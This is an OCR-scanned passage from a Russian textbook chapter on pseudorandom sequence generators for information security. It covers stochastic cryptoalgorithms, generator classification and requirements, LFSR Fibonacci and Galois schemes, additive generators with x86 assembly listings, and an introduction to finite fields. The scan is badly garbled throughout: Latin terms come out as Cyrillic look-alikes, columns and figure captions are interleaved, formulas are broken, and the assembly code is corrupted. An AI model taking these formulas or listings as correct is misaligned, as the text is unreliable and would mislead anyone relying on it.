определяется качеством используемых алгоритмов генерации ПСП. Иначе говоря, 348% 
построения эффективных генераторов ПСП и оценка соответствия формируемых последов 
тельностей предъявляемым к ним требованиям являются чрезвычайно актуальными. 

Термин «стохастические методы защиты» применяется и в узком смысле, когда ре 
идет об алгоритмах, предполагающих использование стохастических сумматоров, т 
сумматоров с непредсказуемым результатом работы, зависящим от заполнения ключе8 
таблицы (раздел 2.6). Впервые эти устройства были предложены С. А. Осмоловс"" 
и использованы для создании стохастических помехоустойчивых кодов. 

Можно выделить следующие задачи, требующие решения при построения сиб" 
защиты КС ответственного назначения (рис. 2.2.1): 


е\№ 


3) 
Хеширование 
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есп чение рабо 
1) об спе тоспособности компонентов КС и системы в ело 
Ц м при наличии 


йных И умышл 
случай у енных деструктивных воздействий; 


печение секрет 
2) обес ретности и конфиденциальности информации или наиболе 
е важной 


ее части, защита от НСД; 


3) обеспечение зутентичности информации (целостности, подлинност 

4) обеспечение аутентичности участников информационного обмена; ии тр 
5) обеспечение юридической значимости пересылаемых электронных а; 

6) обеспечение неотслеживаемости информационных потоков а 
7) защита прав собственников информации. в системе; 


Перечисленные за. _ 

Р дачи — это объекты исследований таких на 

техническая диагностика, криптография стегано учных дисциплин, как 
ы 


ционная безопасность. графия, теория кодирования, информа- 


Во всех рассмотренн 
ых случаях генераторы ПС 
ры П применяютс : 
я либо непосредс 
твен- 


но, либо косвенно, ког 
1 п , да на их основе строятся генераторы случай 
стей (СП) и хеш-генераторы. аиных последовательно- 


аче го 

ны стохастическими метолайи ря все перечисленные задачи могут быть реше 

. разом, необходимы - 

оценивать формируемые последовательности " на  пучайнос ‚Средства, позволяющие 
ть ) 


экспериментов и анализа полученных результатов методика проведения 


| ормирование тес. овых воздейст ИИ На входь оверяемых комг тонентов КС 


2) формир 
ование эл 
сти в результат бота вероятностного пространства при внесении неопреде 
цепции ы алгоритмов защиты информации (наприм ределенно- 
вероятностного шифрования); ример, реализации кон- 
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3) опр делен: С. (0 Т 
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| } ы 


4) ф 
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гаммы при шиф 
ига ровании информа 
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. > 


5 ф 
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Формирование эпементов вероятностного пространства 
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И ипи время работы алгоритмов защиты 
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ов ПСП Рис. 2.2.2. Функции генераторов ПСП в защищенных КС 
рис. 2.2.1. Задачи, решаемые с использованием генератор унку ратор щи 
ис. 2.2.1. ' 


23, Алгоритмы генерации псевдослучайных 


последовательностей (ПСП) 


23.1. Стохастические криптоалгоритмы 


Наиболее эффективным и перспективным методом защиты информации является ее крип- 


по афическое преобразование (шифрование или формирование контрольного кода), в неко- 
е случаях этот метод является единственно возможным. 


а рис. 2.3.1, а показана схема абсолютно стойкого шифра. Абсолютная стойкость 
иптосхемы объясняется отсутствием каких-либо закономерностей в зашифрованных 
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122. 


данных. Противник, перехвативший шифротекст, не может на основе его анализа полу. 
чить какую-либо информацию об исходном тексте. Это свойство достигается при выпоз. 
нении трех требований: | 

В 


я равенство длин ключа и исходного текста, , 


Ш случайность ключа, 


Ш однократное использование ключа. , 
/ 


Дополнительные требования, предъявляемые к этой схеме, делают ее слишком дорого. 
тате на практике применяется схема, показанная на рис. 2.3.1, с 


и непрактичной. В резуль 
надежность которой определяется качеством используемого генератора ПСП. Данны. 
Ошрш Еее4Васк. Каждый эл. 


криптоалгоритм называют шифрованием в режиме ОЕВ — 
мент р, исходной последовательности р шифруется независимо от других © использование. 


соответствующего элемента \, ключевой последовательности \. При использовании схем. 


гаммирования с обратной связью (рис. 2.3.1, в) результат шифрования каждого элемен 


входной последовательности зависит от всех предшествующих элементов. Данный крит 
алгоритм называют шифрованием в режиме СЕВ — Срйемех Е ее4Васк. 


и 
/ 
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8 
Рис. 2.3.1. Использование генераторов ПСП при шифрованич информации: 
а — схема абсолютно стойкого шифра; 
б — схема гаммирования (синхронное поточное шифрование); 
в — схема гаммирования с обратной связью (самосинхронизирующееся поточное шифр 
С — генератор ПСП, РЁ — линейная (например, ХОК или то4 р) чли нелинейная функция, 
функция обратной связи генератора ПСП, @ — элементы памяти генератора ПСП 

. , 


ований 
ЕВ 
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ажную роль в система: 
В , НЯ пис 2 Хх х защиты играет хеширование информации по 
занно . 2.3.2. Хеш-преобразование используется: схеме, пока- 


при ормировании к 
и и ми Е (СЕСко онтрольных кодов, обеспечивающих проверк 
ды) или правильности хода выполнения п У иелостности 
и при организации парольных систем; рограмм; 
, 
я при реализации протоколов электронной подписи 


4-44 






Исходная 
информация р 


^^. | 
хэш-образ | 
Я (р) 
6 


Рис. 2.3.2. Х, 
, 6.3.2. еширование ин . 
а- схема формации: 


фо мчуровани 
рмур я хеш-образа массива данных произвольной длины; 
, 


принцип действия хеш-функини. 


р! элементь! (6. ОКИ) ис очного массива разрядн‹ ти п { — 
( Л. ) х. <М, Е < м 
.“- 


В (р), м — 
р), разрядность генератора ПСП разрядность хеш-образа 


2.3. 
2. Классификация генераторов ПСП 


Ген 
ераторы ПСП 
мож 
Гра Ические. К некрипто и на две группы: некриптографические и к 
Ционирующие в отрафическим относятся конгруэнтные генераторы и гене  торы, 
тх полях. К криптографическим — блочные и и 
чные 





АОИ 
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генераторы, генераторы на основе односторонних функций, а также устройства, работа 
которых основана на использовании стохастических сумматоров. 

Достоинство некриптографических генераторов — эффективная программная и аппа. 
ратная реализация. Недостаток — предсказуемость. Разновидность конгруэнтных генера. 
торов — аддитивные генераторы Галуа и Фибоначчи, генераторы, функционирующие 
в конечных полях, можно использовать лишь в качестве строительных блоков при разра. 
ботке качественных генераторов ПСИ. 

Можно выделить два подхода при использовании в составе генераторов ПСП нели. 
нейных функций; использование нелинейной функции Ех непосредственно в цепи обрат. 
ной связи (рис. 2.3.3, а), где ЕВ — нелинейная функция обратной связи, и двухступенчатая 
структура (2.3.3, 6), где ЕВ — линейная или нелинейная функция обратной связи, в кото. 
рой задача первой ступени (по сути, счетчика) заключается всего лишь в обеспечения 
максимально большого периода при данном числе М элементов памяти О. Во втором 
случае нелинейная функция является функцией выхода Ро\\. 

Вторая схема более предпочтительна, так как первая имеет следующие недостатки" 

1) преобразование Ек является двухпараметрическим, при этом нет никакой гаран 
что при всех значениях секретного параметра К формируемая последовательн 
будет иметь достаточно большой период; 











2) при возникновении ошибки на каком-то шаге выполнения нелинейного преобразова 
ния ЕВ искажаются все последующие элементы ПСП. 

При построении блочных криптографических генераторов в первую очередь уделяется 
внимание их непредсказуемости. Нелинейное преобразование, определяющее свойств 
непредсказуемости, суть многократное повторение одной и той же раундовой операции. 

Основной целью построения поточных генераторов является высокая скорость работы 
при приемлемой для большинства приложений непредсказуемости. В отличие от блочных 
генераторов ПСП здесь нет единого принципа построения. Можно выделить лишь с 
дующие тенденции: 


Ш использование операций в конечных полях; , 
и использование таблиц замен, непрерывно изменяющихся в процессе работы. 


Наиболее обоснованными математически следует признать генераторы с использован! 
ем односторонних функций. Непредсказуемость данных генераторов основывается я 
сложности решения ряда математических задач (например, задачи дискретного логари 
мирования или задачи разложения больших чисел на простые множители). Существен 
недостатком генераторов этого класса является низкая производительность. 

Анализ криптографических генераторов позволяет сделать два основных вывода 





1 
1) существует трудно разрешимое противоречие между качеством формируемых пс 
с одной стороны, и эффективностью программной и аппаратной реализации гене 
торов, с другой стороны; 
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елсказуемость 
р непр лок ы гость крипттрафических генераторов генераторов основывается на недо. 
казу ниях о том, что у аналитика не хватит ресурсов (вычислительных 
ы 


нных ил тных) для Инв 
време ных. и стоимос ых) того, чтобы ертировать нелинейную функцию 
обратн язи или нелинейную функцию выхода генератора ПСП. у 





а 


Рис. 
233. Два варчанта построения генератора ПСП: 
— снелинейной бл т 
асе ейной внутренней логикой (режим ОЕВ — Ошри РееВас®); 
к линеиной внешней логикой (режим Соитей; | 
_ — Ю 
входной и преобразованный вектор ошибок. 


[@) - элементы памяти генера ора ЕВ — линецная или нелинепная ф нкция обратной СВЯЗЫ | - 
А К Л! у 
и ГК 


елинейная н у — н я Г н т — н 

. кция, \; 

фу ция, \; элеме Выход оц оследова ельнос ие вход оц век ор ошибок 
содержащий 1 в разр; Зах, соответс вук цих измененным (искаженнь м) би там, е — ' 
'реобразованный (выходной) век ор ошибок | | | 


2.3 3 
’ Требования к генераторам ПСП. 
Криптостойкость 
К 
Вана тВеННЬ 


тй генератор псевдо йной 
ый случайной последовател 
на использование в системах з и орять се. 


Щим требованиям: 


ащиты информации, должен удовлетворять сле- 
кри 
Птографическая стойкость; 
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Ш хорошие статистические свойства, ИСИ по своим статистическим свойствам не должна 
существенно отличаться от истинно случайной последовательности; 

ш большой период формируемой последовательности; 

ш эффективная аппаратная и программная реализация. 


Основным свойством криптостойкого генератора ПСП является непредсказуемост, 
влево — криптоаналитик, знающий принцип работы такого генератора, имеющий воз. 
можность анализировать фрагмент 

+1 +2... +а-1) 
выходной последовательности, но не знающий используемой ключевой информации, для 
определения предыдущего выработанного элемента последовательности \; _ 1 не может 
предложить лучшего способа, чем подбрасывание жребия. 

В рамках другого подхода к построению качественного генератора ПСП предлагается 
свести задачу, построения криптографически сильного генератора к задаче построения 
статистически безопасного генератора. Статистически безопасный генератор ПСП, 
должен удовлетворять следующим требованиям: 

ш ни один статистический тест не обнаруживает в ПСП каких-либо закономерно 
иными словами не отличает эту последовательность от истинно случайной; 

№ нелинейное преобразование РЁ» ‚ зависящее от секретной информации (ключа Ю, 
пользуемое для построения генератора (рис. 2.1.3), должно обладать свойством " 
множения" искажений — все выходные (преобразованные) вектора е' возмо: 

и равновероятны независимо от исходного вектора е, 

ш при инициализации случайными значениями генератор порождает статистиче 
независимые ПСП. 


2.3.4. Генераторы ПСП на регистрах сдвига 


с линейными обратными связями 


Важнейшим классом ПСП являются последовательности, формируемые генератор" 
ми на основе регистров сдвига с линейными обратными связями — ГЕК (тей 
Еее4Ьаск 5 Кезляег). Используемый при их анализе математический аппарат — те 
линейных последовательностных машин и теория конечных полей (полей Галуа). 38 
устройства являются эффективным средством защиты от случайных деструктивных 82 


действий. Основными достоинствами этих генераторов являются: 


Ш простота аппаратной и программной реализации; 


Ш максимальное быстродействие; 
Ш хорошие статистические свойства формируемых последовательностей; 
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можность по 
з воз эжность построения на их основе генераторов, обладающих свойствами, не 
три тре ческих задач защиты информации (формирование  поледова 
длины, формирование последовательностей с  педпериод 
| 


ормирование ПСП 
формир К с произвольным законом распределения, пос 
обладающих свойством самоконтроля ит. п.) | при тонератор 


Генераторы М-последовательностей 
ностей, к сожалению, не являю ипт Ким 
‚ не тся криптостой 
и, что 


чает возможность их ис 
клона ть пользования для защиты от умышленных деструктивных возд 
ствий. няются при решении таких задач лишь в качеств в. 
Наиболее известные прим о 


лей Галуа: 

и СКС-коды — идеальное средство ко 
искажениях информации; 

и поточные шифры 45, РАМАМА, $5ОВЕК и др.; 


в блочный шифр АЛЛУРАЕЕ, п = 
ской защиты ХХ] века а в 2001 г. в качестве 


троительных блоко 
еры . 
ры использования [Е5К и математического аппарата | 


нтроля целостности информации при случайн 


стандарта криптографи: 


Исходная информация для построения двоичного [75 В 
щий многочлен. Степень этого многочлена определяет 
а ненулевые коэффициенты — : 


— так называемый образу 


азряднос Ъ ре истра 
Т т СДВИ 
характер обратных связей. Т ак например МНОГ очлену 

› 


— 8 
и Ф(х) = +++ +1 
тветствуют два устройства, показанные на 


ому образующему нгочлену ы рис. 2.1.4 и 2.1.5. В обшем случае двор 


М —_—__ 
Ф(х = ; ', = = | ‚ = 
( ) ах ам = в =1, Е {0,1}, 1=1,(М-1}, 


со й 
ре тВУЮт устройства, пок 
О — схема Галуа). 
сл Й 
ож и образующий многочлен примитивный — 
№ ное число состояний 2” 
о ируют двоичные послед 
то ‘довательностями. В это 
Тривиального цикла и 


азанные на рис. 2.3, а ([РЕ$5Ю1 — схема Фибоначчи) и 


м устройства имеют максимальное вс 
ыы нулевое состояние является запрещенным), а знач 
Г к 
тельности максимальной длины 2^ — | называемые / 

> 


м слу тае диаг раму на состоянии генератора СОСТОИТ из ОД 
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Рис. 23.5 Ге 
.3.5. Ген - 
тян Галуа (ЕР5Е?), соответствующий Ф(х) = х8 + х? + хз + х3 + 1, иего 9цаграмма 





аФ< = ++ и 
Рис. 2.3.4. Генератор Фибоначчи ((ЕЗКЛ), соответствующим Фо =Ж+Х + 


дчаграмма состояний 














<” 
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3.6. Общий виа ЕЕК, соответствующих , 

ве + ам-1 4... +ах+..+ аох? + азх + 1: 
а — схема генератора Фибоначчи; 

б — и схема генератора Галуа 


БУ — блоки умножени; на а; = {0, 1 }; рч а; =1 умножение на а; равносильно нал 


; но от СТВИЮ СВЯЗИ 
прча; = 0 умножение на а; равносиль сут 









.==== 1Ёз:1 - процедура одного такта работы 







= - вектор обратных связей, например, ==== 
= О 2+ х уо+ж +1 геедВаск = 00400. 


й значащем разряде, 
= - содержащий "1" в первом ‚— 
ея я 100%. На входе в старших = 


= 8 Мазк = 

например, для № 8 — 
= аврядах АХ находится "старое" состояние ТЕЗВ, и 
— " . 
.==== на выходе в старших разрядах АХ - "новое" состояние 


12811 РВОС 
разВ Ьх 
доу Ьх, ах 
$61 ах, 1 


сезе Ьх, гееЧВаск 
Эр Ех 











ичиЮ СВЯЗИ, 
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ог ах, МазК 

хи: рор Ьх 
гее 

1511 ЕМОР 

и 


1Ёзг2 - процедура одного такта работы ====== 


(генерации одного бита ПСП) генератора Галуа. 








РеедВаск - вектор обратных связей, например, = 
для $Ф(х) = ж+ж РееЧВаск = 28001. ============ 
На входе в старших разрядах АХ находится "старое" состояние, 








;==н== На ВЫХОДЕ в старших разрядах АХ - "новое" состояние БЕЗВ. === 
РВОС 
$51 ах, 1 
Эпс Ех 
хог ах, ГееЯВаск 
БИ: ге 
1:2  ЕМОР 


Рассмотренные устройства могут использоваться только для генерации битовь 
ПСП. Если необходима и-разрядная последовательность, можно предложить два вариа 
та действий. В первом случае выбираем образующий многочлен степени №1, выбира‹ 
схему [ЕЗК1 или [Е$К2 и считываем очередной и-разрядный двоичный код с соседн! 
разрядов регистра сдвига каждые и тактов работы [Е5К. Во втором случае синтезиру‹ 
схему устройства, работающего в и раз быстрее исходного [Е5$А (иначе говоря, выпо 
няющего за один такт своей работы преобразования, которые в исходном [.Е5А выпо 
няются за и тактов). Этот вариант особенно эффективен в тех случаях, когда образу! 
щий многочлен генератора Фибоначчи имеет вид Фо = хи ++ Тай кратно я. 

В обоих случаях следует помнить о возможности вырождения генератора при в 
бранных значениях Ми п. Справедливо следующее утверждение. Если Ф(х) — примити 
ный многочлен, п-разрядный генератор будет иметь максимально возможный пери 
2-1 тогда и только тогда, когда числа 2" — 1 и п взаимно просты. Если при требу 
мых значениях М и я это условие не выполняется, выбираем ии, для которого справе 
Ливо условие (2^-1, п') = 1, синтезируем я'-разрядный генератор и снимаем с его выхо 
"-разрядную ПСП. 

На рис. 2.3.7 приведена схема байтового генератора ПСП, работающего в 8 раз быстр 


51, соответствующего многочлену Ф(х) =х°° + х* + 1 (рис. 2.3.8). Ниже приведена е 
Программная реализация. 


5* 
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доу сх, 8 
ада $1, сх 
оу 91, $1 
ес 81 
56а 

; вычисление байта обратной связи 
пу ав, ВУТЕ РТВ [91] 
11 ав, 1 
поу 1, ВУТЕ РТВ [$1] 
2с1. а], 1 
ХоГ а1, ВУТЕ РТВ [91 - 5] 

; формирование "нового" состояния генератора 

тер поУ$Ь 
по ВУТЕ РТВ [91], а! 

; восстановление содержимого регистров 
рор ез 91 сх 
рорЁ 
те 

вуке1Ё5т1 ЕМОР 


рис. 2.3.7. Схема байтового генератора ПСП, соответствующего Фо) = 8 +? +1.4- На рис. 2.1.9 показан вид массива Кез; после выполнения команды ВЕС 5Т. 


состояние /-го разряда Е Е$К1, { = 0,64 


Кед5 





рис. 2.3.8. [Е5В1, соответствующий многочлену Ф(®) = х65 + хз? +1 


й Примеры 





При вызове; = 
массив регистров Ведз - текущее состояние генератора, = 
р$ - сегментный адрес массива Ведз, $Т - относительный 
==== адрес массива Ве9$; при возврате: массив регистров Ведз$ - 
новое состояние генератора, АЁ - выходной байт. = 


































































| Вусе15:1 РВОС 
й ; сохранение содержимого используемых регистров 
| ризВЕ 
разв сх 91 е5 
; инициализация 
| разв 95 
рор ез ` ` 





Рис. 2.3.9. Массив Керз 
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На рис. 2.3.10 в шестнадцатеричном виде приведены результат отладки программной 1093м ии 
модели байтового генератора в течение 8 тактов. Выходная последовательность. ; 8 тактов работы генератора 
снимаемая с выходов элементов ХОК, при выбранном начальном состоянии имеет вид цехеС1оск: ВЕ 5,1 
2В 62 35 12 РВ СЕ 5Ь 36... тСЕ ах, 1 
Эпс 2егогВ 
хог Ьх, РВН1ЧВ 


Кед5 . 
71его : 
состояние |_12 56 | 78 ом [в [® | 1оор насос 
; запись нового с стояния генератора 











. рор 81 
поу МОВР РТВ [$1], Бх 
1пс 31 
1пс $1 
поу МОВО РТВ [$1], ах 
; восстановление регистров 
+ рор сх рх 
й рорЕ 
‚ геё 
: вуке1Ез:2 ЕМОР 
| 
Рис. 2.3.10. Результаты отладки прог аммной модели байтового генератора псп, О 
и 
соответствующего ФФ = х°° + 2+1 [аа КБ Га [9 [ь [5 99а 9] 
й . 15... 0 
Ниже приведена программная модель байтового генератора ПСП, в которой очере-- вх | — 
> >“ > в 
ной байт выходной последовательности считывается в каждом восьмом такте работы | И 
АХ 


ГЕ$Е2, соответствующего многочлену степени М, 16 < М< 33. 

; ЗеЕЕЕЕЕЕЕЕЕЕЕЕЕЕНЕЕЯЕ --===ЕЕЕЕЕЕЕЕЕЕЕНЕЕЯНЕЕ Состояния генератора ПСП 

;==== Вубе1Ёзхг2 - байто ПСП, соответствующий [4 4-4 | 44% | 4-9 | 9-4 | 
; образующему много 
: 
; 




















> 
> 
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юоеново о ннонннозье 


| 


ооо ьноооо$о- 








= При вызове: массив регистров &е9з - текущее состояние 





генератора, 0$ - сегментный адрес массива Ведз, ====== 
сТ - относительный адрес массива Ведз; при возврате: массив 
регистров Вед - новое состояние генератора, 
51, - выходной байт. ч=====я======-Е- 5-7 











ЕВН1аВ - старшее слово вектора обратных связей, 
младшее слово вектора обратных связей; например === 
при $(х) = Хх + Хх +1 (рис. 2.3.11}, == 
ЕВНЗаЙ = 00018, ЕВЬОМ = 20008. 





донныьоо<оцоонноеоно Г. 
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нон оон онн-нооо$о$ 
ооо ьооосоон-ое 
бов оныныооооонно 
ово ьы ооо нноа- 
м ооо оо<оо,онно©еоно 








РВОС 
‚ сохранение содержимого используемых регистров 

разЪЕ . 
разв Ьх сх 
; инициализация 
.1 с14 
‚| доу сх, 8 
| ; чтение текущего состояние генератора 

роза $1 р 

095“ Ус. 2.3.1 
1. Генератор 8-разрядной ПСП ч фрагмент последовательности его переключений 


хсп9 ах, БХ 
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23.5. — Аддитивные генераторы ПСИ 





Очень эффективна с точки зрения производительности схема, называемая аддитив- 
ным генератором. Самостоятельного значения эти генераторы в силу своей криптогра- 
фической слабости не имеют, но могут использоваться в качестве строительных блоков 



































при создании стойких генераторов ПСП! Генератор состоит из М регистров разрядно- Выход 
стью М каждый и сумматора по модулю 2М_ Начальным заполнением (ключом) генера. Начальное 
тора является массив | состояние [00 [01 [02 | 03 | [5 [6 [07 [63 | 
Такты 
0%(0) 0.:(0) ... Ом (0) Га | 
М.битовых слов. Уравнения работы генератора имеют вид 2 
м 3 
— м 
0.4(+9=Уа0,@) тоа?_, 4 
1 
_ Г | 6 
| 0,(1+1=9,.@, 1=ЪМ-Т, [7 | 
где ОКИ — состояние го регистра в момент времени ‚аа, — коэффициенты многочлена 8 
Ф(х) степени №, примитивного над СЕ). Начальное заполнение выбирается таким обра- "ПЕН Го | 05 | 07 | 09 
зом, чтобы хотя бы в одном из регистров младший бит содержал "1". В этом случае млад. Е 9 | 05 [07 [09 | 


шие биты регистров образуют генерато воичной М-последовательности. Учитывая, что . 
р тр разую ратор д доват , Рис. 2.3.12. Схема аддитивного генератора, соответствующего Ф(х) = №+х+1М=8 
при большом числе ненулевых коэффициентов Ф(х) быстродействие схемы снижается, и фрагмент последовательности его переключений у ' 


возможна модификация схемы генератора с распределением двухвходовых блоков сложе- М 
ожно предложить два способа программной реализации аддитивного генератора 


м 

ния по модулю 2” между регистрами. р 

ду. регистр а Первый заключается в реализации схемы, показанной на рис. 2.3.12, когда обратны‹ 
На рис. 2.3.12 показан пример такого генератора для случая, когда Ф(х) вх’ +х +1. связи зафиксированы и происходит сдвиг содержимого регистров 


М = $. Тогда генератор формирует рекуррентную последовательность в соответствий 
с формулой 











АаЧбеп1 - аддитивный байтовый генератор (вариант 1), 
соответствующий многочлену $Ф(х) = Их +1. ===Ееаы 


0,= (©5+ 0,9 то? тест 


При вызове: массив регистров Ведз 

. . - т === 
При начальном состоянии 00 01 02 03 04 05 06 07 08 устройство на выходе сумматор генератора, 03 - я меноный пре ры 
формирует последовательность 38, 


= ВХ - относительный адрес массива Ведз; Тар1, Тар2 - = 
ОВ 0907 05 0ЕОС 09 06 0Е 17... (Нех). 


















отводы обратной связи, например при Ф(х) = +41, ==н==еЕ 





= Тар1 ='8, Тар2 = 3. При возврате: массив регистров Ведз - ==== 






АЧЧбел1 РВОС 
} Сохранение регистров 


разрЕ 
, разв ез $1 94 сх 
} Инициализация 

разв 9$ 

рор ез 


$4 





х 9 
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оу 41, Тар1 312 Песгемрт 
пу сх, 91 оу 91, 8 ы 
ааа 91, Ьх и Эр Вестет51 
оу 51, 91 ресгет0Т: ес И 
дес 51 фе5Е 51, 51 
; Вычисление байта обратной связи 912 Бесгепёт 
оу а1, ВУТЕ РТВ [Ьх + Тар2] поУ 51, 8 
ааа а!, ВУТЕ РТВ [91) \ тр ОЕОЕРгос 
; Определение нового состояния генератора . рестемб1: 
гер поу5Ь | дес 51 ; 
по ТЕ РТА ПЬЮ, = ноВкое, окончание такта работы генератора 
; Восстановление регистров ; Сохранение отводов обратной связи 
рор сх 91 $1 ез оу С$: Тар1, 91 
рорЁ . поу сз: Таро, $1 
ее ; Восстановление регистров 
АЗЧбепт1 ЕМОР рор 91 $1 
рорЕ 
Второй способ предполагает фиксацию содержимого тех регистров, которые не те 
‚ являются приемниками сигнала обратной связи, "двигаются" лишь отводы обратной Тар\ №) Тп1Тар1 ; 
связи. Ниже приведена реализация такого алгоритма, очевидно, что его эффектив- Тар2 р. То Тар2 ‘. 
ность возрастает с ростом степени М образующего многочлена. Аа4бел2 ЕМОР 








АаЧ4беп? - аддитивный байтовый генератор (вариант 2), 
соответствующий многочлену Ф(х) = Хх +1. = 












; . . МОРЕР Е 1пу 
; При вызове: массив регистров Ведз - текущее состояние === . СОБЕ 
; генератора, 05 - сегментный адрес массива Ведз, , О8С 1008 
ВХ - относительный адрес массива Ведз; при возврате: == ет Эпир Мехе1тзЕЕ 
массив регистров Ведз - новое состояние генератора, == 895 18 0,1,2,3,4,5,6,7,8 





АБ - выходной байт. Начальные значения отводов обратной связи: ОцеВукез ОВ 10 БР (?) 








= тар] =№-1, Г Тар2 =1-1. шИар1 800 8 
еее сиениииаиии иене не ееннЕнЕнЕнЕЕкнннеЕнныЕ ИТар? ЕО0 3 
Ааабеп? РВОС АехеТлзг: 
‚ } Сохранение регистров оу сх, 10 
разпЕ оу 1, ОРЕЗЕТ ОцеВукез 
р , разв $1 91 поу Ьх, ОРЕЗЕТ Ведз 
| ; Восстановление отводов обратной связи Кехев с1а 
| оу 41, сз: Тар1 усе: 
т поу 31, сз: Тар2 са11 АЗаСеп1 
| ; Вычисление байта обратной связи и обновление содержимого элемента зеозЬ 
| ; массива Ведз с индексом ПТ Е Зоор МехеВусе 
| оу а1, ВУТЕ РТВ [Ъх+91] , р оу ах, 4008 
й } 116 218 
| ааа а], ВУТЕ РТВ {[рх+$1] Ааа п 
|. пох — ВУТЕ РТВ [Ьх+Ч1, а] | бела РВОС 


Й ; Вычисление отводов обратной связи 


4995 
| {езе Ч, 91 ` еп? ЕМОР 
Н 
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Результаты отладки А44Сен2 при Ф(х) = + +1 представлены на рис. 2.3.13. 


СИИ 
Начальное © 1 2 3 4 5 6 7 81 01 $1 Выход АЕ 


состояние | 00 | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 83 


Такты 
Г1 









































Рис. 2.3.13. Результаты! отладки процедуры Ада Сеп2 


Таким же образом могут быть реализованы генераторы ПСИ на основе [ЕЗК, напри- 
мер, аналогичные показанному на рис. 2.3.7, а также генераторы, функционирующие 
в конечных полях, которые будут рассмотрены в последующих разделах. 


2.4. Конечные поля 


2.4.1. Введение 


Математический аппарат теории конечных полей (полей Галуа) игироко используется 
для решения следующих задач: 

Ш разработка и исследование свойств кодов, обнаруживающих и исправляющих ошибки; 

Ш построение САС-генераторов и исследование свойств САС-кодов, которые являются 
всеми признанным идеальным средством контроля целостности информации при 
случайных искажениях информации; 

Ш разработка и реализация поточных криптоалгоритмов, наиболее известный пример - 
шифр ЗОВЕК и др.; 

Ш разработка и реализация блочных криптоалгоритмов, наиболее известный пример - 
блочный шифр К/МРАЕЕ, принятый в 2000 г. в качестве стандарта криптографиче” 
ской защиты ХХ] века — АЕ5; 

Ш построение криптографических протоколов, наиболее известный пример — протокол 
выработки общего секретного ключа Диффи-Хэллмана; 


№ до 
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построение криптосистем с открытым ключом, например криптосистемы, основанно 
на свойствах эллиптических кривых — ЕСС. 


2.4.2. Основы теории конечных полей 


Поле - это множество элементов, обладающее следующими свойствами: 
в внем определены операции сложения, вычитания, умножения и деления; 


и для любых элементов поля ©, В и 7 должны выполняться соотношения (свойств 
ассоциативности, дистрибутивности и коммутативности) 


а+В=В-а, 
оВ = Во, 
а+ (В+) = (а+В) +7, 
а(Ву) = (аВ)у, 
а(В+у) = аВ+ау; 
и вполе должны существовать такие элементы 0, 1, -@& и (для а + 0) о ', что 
О+а=а, а+ (4) = 0, ба= 0, 1а=а, а(а') = 1. 


Конечное поле содержит конечное число элементов. Поле из Г элементов обозначает 
ся СЕ) и называется полем Галуа в честь первооткрывателя Эвариста Галуа (1811 
1832). Все ненулевые элементы конечного поля могут быть представлены в виде степен 
некоторого фиксированного элемента поля ©, называемого примитивным элементом. 

Простейшие поля получаются следующим образом. Пусть р — простое число. Тогл 
целые числа 0, 1,2, ... ‚ (р- 1) образуют поле СЁЕ(р), при этом операции сложения, вычу 


тания, умножения и деления выполняются по модулю р. Более строго, СЁ(р) — это пол 
классов вычетов по модулю р, т. е. 


СЕФ) = {0, 1,2, ..., (р-1)}}, 
где через 0 обозначаются все числа, кратные р, через 1 — все числа, дающие при делени 
На р остаток 1, ит. д. С учетом этого вместо (р -— 1) можно писать — 1. Утверждение а = 
8 СЕ) означает, что а — В делится на р или что © сравнимо с В по модулю р, т. е. 


а = В(то4 р). 

Поле, содержашее Ё = р" элементов, где р — простое число, а и — натуральное, не м‹ 
жет быть образовано из совокупности целых чисел по модулю Ё. Например, в множесте 
Сов вычетов по модулю 4 элемент 2 не имеет обратного, так как 2.2 = 0. Таким обр: 

‚› хотя это множество состоит из 4 элементов, оно совсем не похоже на поле СЕЁ 

тобы подчеркнуть это различие, обычно вместо СЕ(4) пишут СЕ(2?). 
с коем ентами поля из р” элементов являются все многочлены степени не более (и_‹ 
Ффициентами из поля СЕ(р). Сложение в СЕ") выполняется по обычным прав 
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лам сложения многочленов, при этом операции приведения подобных членов осущест; 
ляются по модулю р. Многочлен с коэффициентами из СК) (Т. е. многочлен над пол. 

СЁЕф)), не являющийся произведением двух многочленов меньшей степени, называет. 
неприводимым. Примитивный многочлен автоматически является неприводимым. Выс. 
рем фиксированный неприводимый многочлен $ф(х) степени и. Тогда произведение дв. 
элементов поля получается в результате их перемножения с последующим взяти. 
остатка после деления на ф(х). Таким образом, поле СЕф”) можно представить как пс. 
классов эквивалентности многочленов над СЁ(р). Два таких многочлена объявляю” 

эквивалентными, если их разность делится на ф(х). Конечные поля порядка р" сущест» 
ют для всех простых р и всех натуральных и. 

Пусть 


р=2,п=4, ф(х)=х +х+1 
— примитивный над СЕ(2). Элементы поля СЕ(2“) имеют вид | 
О хх, + +х+ 1. ! 


Так как $(х) - примитивный, ему соответствует устройство, диаграмма состояний 
которого состоит из цикла максимальной длины 2 — | и одного тривиального цикла, 
включающего состояние 0000, переходящее само в себя (рис. 2.4.1). Таким образом, в 
качестве 6) можно взять корень ф(х), а устройство, для которого ф(х) = х +х- 1 является 
характеристическим многочленом, объявить генератором ненулевых элементов поля. 
В результате соответствие между различными представлениями элементов поля (в виде 
наборов коэффициентов многочлена, в виде многочленов и в виде степеней примитивно- 
го элемента) имеет вид, представленный на рис. 2.4.2. Состояния генератора определяют 
список элементов СЕ(2“) в порядке возрастания степеней 6), т.е. один такт работы уст- 
ройства, соответствующего характеристическому многочлену $(х), суть умножение 
текущего состояния устройства на ® =х. 


4 
Типичные операции сложения, умножения и деления в поле СЁ(2”) в рассматривае- 
мом случае выглядят следующим образом: 


Оч = +х 


В 1101 +0111 = 1010; 
(Х+ Ио + х) = 0-0 = об 
или 
бе + + хтод о) =х+х +1; 
Хх +): +7) = 0:06 = 0 =х+1. 
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рии ово и попов нии поп виновен нити ато оорроповозниивии носит 





[ооо] 





Рис. 2.4.1. [ Е5К, соответствующий характеристическому многочлену над полем СЁ) 
ФФ) =‘ +х + 1, чего диаграмма состояний 
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Я МИ УИ АН Г риивитазжнннья 
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| 
| 
| 





В виде 











коэффициентов 7900 
многочлена 
99 9 % сто] 
об от! 
оото: 0910 
отоо: ое 
{1 000: 
о отт: па: 
{ют то: 
у 100: й 
роза, рис. 2.4.3. [Е$К, соответствующий характеристическому многочлену ф(х) = х* + * + +х+1, и 
ото: его диаграмма состояний 
т ото: 
о 11 Диаграмма состояний устройства состоит из трех циклов длиной 5 и одного триви- 
111 ального цикла, а значит данное устройство, один такт которого суть умножение на х 
и по модулю ф(х), не может использоваться в качестве генератора элементов поля. Такая 
1101 .. ,. 
